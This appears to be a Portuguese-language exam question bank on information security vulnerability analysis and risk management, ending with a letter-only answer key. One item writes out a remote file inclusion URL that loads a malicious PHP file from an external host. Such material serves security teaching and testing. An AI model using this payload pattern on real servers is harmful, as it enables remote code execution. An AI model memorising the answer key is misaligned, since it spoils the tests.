Questões de Concurso Sobre análise de vulnerabilidade e gestão de riscos em segurança da informação

Foram encontradas 651 questões

Q3258123 Segurança da Informação
Julgue o item a seguir, a respeito de atributos da informação, gestão de riscos em segurança da informação, gestão de segurança da informação, controles de segurança cibernética e privacidade.
A implementação de um processo de gestão de riscos de segurança da informação conforme as normas ISO 31000, 31010 e 27005 garante que todas as vulnerabilidades de um sistema sejam eliminadas. 
Alternativas
Q3253254 Segurança da Informação
Analise as afirmativas sobre a gestão de vulnerabilidade no âmbito de segurança da informação.

I - Um plano de gestão de vulnerabilidades busca reduzir riscos e aumentar a segurança de seus ativos, buscando identificar, priorizar e mitigar vulnerabilidades em sistemas e redes.
Il - Um plano de gestão de vulnerabilidades bem elaborado elimina a necessidade de implantação de firewalls e anti-malwares.
III - A gestão de vulnerabilidades deve ser delegada exclusivamente ao time de segurança (dentro da equipe de TI), sem envolver outras áreas da empresa, pois estas podem trazer insegurança.

Qual(is) afirmativa(s) esta(ao) correta(s)? 
Alternativas
Q3253221 Segurança da Informação
Analise as afirmativas a seguir sobre a técnica de port Scanning:

I - O port scanning é uma técnica utilizada em testes de segurança e por atacantes para identificar portas abertas e vulnerabilidades em um sistema.
|l - Ao executar o port scan em um sistema e encontrando vulnerabilidade em algum servigo aberto é possível bloquear coexões na(s) porta(s) deste serviço.
lll — Através de ferramentas de port scan é possível realizar uma autenticação em múltiplos serviços de rede para verificar se as credenciais são validas.

Qual(is) afirmativa(s) esta(ao) correta(s)? 
Alternativas
Q3237058 Segurança da Informação
Ação adotada na Gestão de Segurança da Informação (GSI) que visa identificar, avaliar e mitigar os riscos relacionados à segurança da informação. Esta ação pode adotar a análise de vulnerabilidades e ameaças internas e externas, buscando evitar problemas previamente para não reverberar em problemas mais graves no futuro. Qual o nome desta ação adotada na GSI?
Alternativas
Q3237054 Segurança da Informação
Esta etapa da gestão de riscos envolve a definição de uma abordagem estruturada e sistematizada para gerenciar os riscos. Acontece nesta etapa, a determinação dos objetivos, o escopo e os recursos indispensáveis para o processo de gestão de riscos, assim como a definição do processo que será seguido para identificar, avaliar e tratar os riscos, bem como as metodologias e critérios a serem aplicados. O texto fala de qual etapa da gestão de riscos? 
Alternativas
Q3237053 Segurança da Informação
Etapa da gestão de riscos em que os riscos identificados passam por uma avaliação pormenorizadamente, para compreender sua origem e natureza, probabilidade de ocorrência e impacto potencial, assim como é realizada a priorização dos riscos com base nas consequências do seu impacto e na probabilidade de ocorrência. O texto fala de qual etapa da gestão de riscos?
Alternativas
Q3237051 Segurança da Informação
Conjunto de estratégias que incluem processos e procedimentos criados para assegurar que uma organização possa dar continuidade as operações fundamentos durante e após um evento disruptivo ou de crise no meio onde será aplicado. A finalidade central deste conjunto de estratégias é a minimização dos impactos de incidentes (como por exemplo, desastres naturais, falhas de sistemas, ataques virtuais, entre outros) e garantir que os processos críticos do negócio possam ser retomados com de forma rápida. Qual o nome que dar-se a esse conjunto de estratégias? 
Alternativas
Q3234668 Segurança da Informação
No contexto de segurança web, qual vulnerabilidade permite a execução de scripts maliciosos no navegador do usuário?
Alternativas
Q3216522 Segurança da Informação
Considere as seguintes situações:

I. O Tribunal adquire um novo sistema digital para agilizar o acesso seguro aos processos judiciais, mas a falta de treinamento dos usuários compromete o alcance dos objetivos de aumento de produtividade, celeridade e eficiência. 
II. A mudança de sistema de provedor de e-mails do Tribunal resulta na perda de acesso às informações trocadas, impactando diretamente o fluxo de trabalho e causando empecilho à prestação de contas às instâncias controladoras.
III. O Tribunal é notificado por um órgão regulador de que descumpriu normas de transparência pública exigidas por lei, devido é ausência de algumas informações obrigatórias em seu portal de transparência.
IV. Foi decidido que a elaboração de um plano de contingência poderia ser adiada e, quando ocorreu um evento que provocou a interrupção significativa no atendimento aos cidadãos, isso gerou insatisfação dos jurisdicionados, comprometendo os objetivos do Tribunal de bem atender aos cidadãos.
V. Em uma inspeção de auditoria, constatou-se que houve problemas internos que impediram que dados relevantes sobre os processos em andamento fossem reportados adequadamente, dificultando a tomada de decisões e o cumprimento das obrigações de accountability.


De acordo com a Política de Gestão de Riscos (Ato TRT-GP n° 118/2018), as situações I, II, III, IV e V correspondem, correta e respectivamente, aos tipos de riscos:
Alternativas
Q3216509 Segurança da Informação
Uma equipe de Analistas do Tribunal Regional do Trabalho estava discutindo aspectos técnicos das práticas de gestão e governança propostas por consagrados quias, metodologias e normas ABNT. Uma Analista afirmou corretamente que, de acordo com
Alternativas
Q3212061 Segurança da Informação

Em relação à análise de vulnerabilidades, julgue o item a seguir. 


Cross-site scripting é um tipo clássico de CVE (Common Vulnerabilities and Exposures) que permite a neutralização de entradas com parâmetros inadequados para um sistema Web. 

Alternativas
Q3212060 Segurança da Informação

Em relação à análise de vulnerabilidades, julgue o item a seguir. 


Buffer overflow é um tipo de CWE (Common Weakness Enumeration) que ocorre quando a quantidade de dados no buffer é a mesma da capacidade de armazenamento correspondente alocada em memória pela aplicação. 

Alternativas
Q3210349 Segurança da Informação
Julgue o próximo item, a respeito de ataques de negação de serviço, controles CIS, gerenciamento de incidentes de segurança da informação e gestão de riscos e continuidade de negócio.

Considerando que os riscos, em sua maior parte, são estáticos, o monitoramento permanente de cenários de eventos, valores de ativos, ameaças e vulnerabilidades é desnecessário, podendo ser realizado essencialmente em ciclos periódicos de dois a três anos, conforme o tipo de negócio da organização.
Alternativas
Q3208546 Segurança da Informação

Julgue o item a seguir, a respeito de segurança da informação, políticas de segurança, classificação de informações e análise de vulnerabilidades. 


Ao implementar mecanismos para limitar o acesso a recursos informacionais para, apenas, indivíduos ou sistemas autorizados, o controle de acesso contribui diretamente para a confidencialidade na segurança da informação. 

Alternativas
Q3208545 Segurança da Informação

Julgue o item a seguir, a respeito de segurança da informação, políticas de segurança, classificação de informações e análise de vulnerabilidades. 


Considerando que uma organização adota o desenvolvimento de software seguro, o uso de ferramentas de varredura de vulnerabilidades será direcionado especificamente às bibliotecas de software de terceiros utilizadas pela organização. 

Alternativas
Q3204246 Segurança da Informação
Assinale a opção que corresponde à definição dada pelo National Institute of Standards and Technology (NIST) para o conceito de Vulnerabilidade.
Alternativas
Q3181007 Segurança da Informação
Um usuário doméstico relatou que seu computador começou a apresentar lentidão significativa após uma atualização automática do sistema operacional. O técnico identificou que o computador estava rodando um antivírus desatualizado e que várias atualizações de segurança estavam pendentes. Além disso, notou a presença de arquivos temporários acumulados e programas sendo executados na inicialização sem necessidade.

Com base nesse cenário, assinale a alternativa INCORRETA sobre as práticas recomendadas para manter a segurança e o desempenho do sistema.
Alternativas
Q3178541 Segurança da Informação
Referente à gestão de riscos em segurança da informação, analise as assertivas abaixo:

I. A análise de riscos envolve a identificação e avaliação dos riscos que podem impactar a segurança da informação.

II. O tratamento de risco pode incluir medidas para mitigar, transferir, aceitar ou evitar o risco.

III. O risco residual é o risco que permanece após a implementação de medidas de tratamento de risco.

Quais estão corretas?
Alternativas
Q3174951 Segurança da Informação
A página web da sociedade empresária Exemplo1234, disponível na internet, permite que internautas acessem o edital de uma vaga de trabalho por meio do endereço eletrônico http://empresa1234.com/vaga.php?file=vaga.pdf.
Durante a verificação de vulnerabilidades contratada por essa empresa, foi observado que o servidor da página web da Empresa1234 processava o valor fornecido no parâmetro file sem realizar validação ou sanitização adequada.
Como resultado, foi possível incluir e executar no servidor o conteúdo de um arquivo malicioso hospedado no endereço http://testevulnerabilidade.com/badpage.php
O teste foi realizado utilizando o seguinte endereço:
http://empresa1234.com/vaga.php?file=http://testevulnerabilida de.com/badpage.php
Ao acessar essa URL, o conteúdo do arquivo badpage.php foi carregado e executado diretamente pelo servidor da Empresa1234, comprometendo sua segurança.
O tipo de vulnerabilidade presente no servidor de página da Empresa1234 é o 
Alternativas
Q3170572 Segurança da Informação

Julgue o próximo item, relativo a noções de segurança da informação e de serviço de inteligência.


A análise de riscos, além de englobar as ameaças e as vulnerabilidades, estende-se aos impactos decorrentes de cada evento adverso.

Alternativas
Respostas
1: E
2: B
3: B
4: D
5: D
6: D
7: B
8: B
9: C
10: D
11: E
12: E
13: E
14: C
15: E
16: A
17: E
18: D
19: D
20: C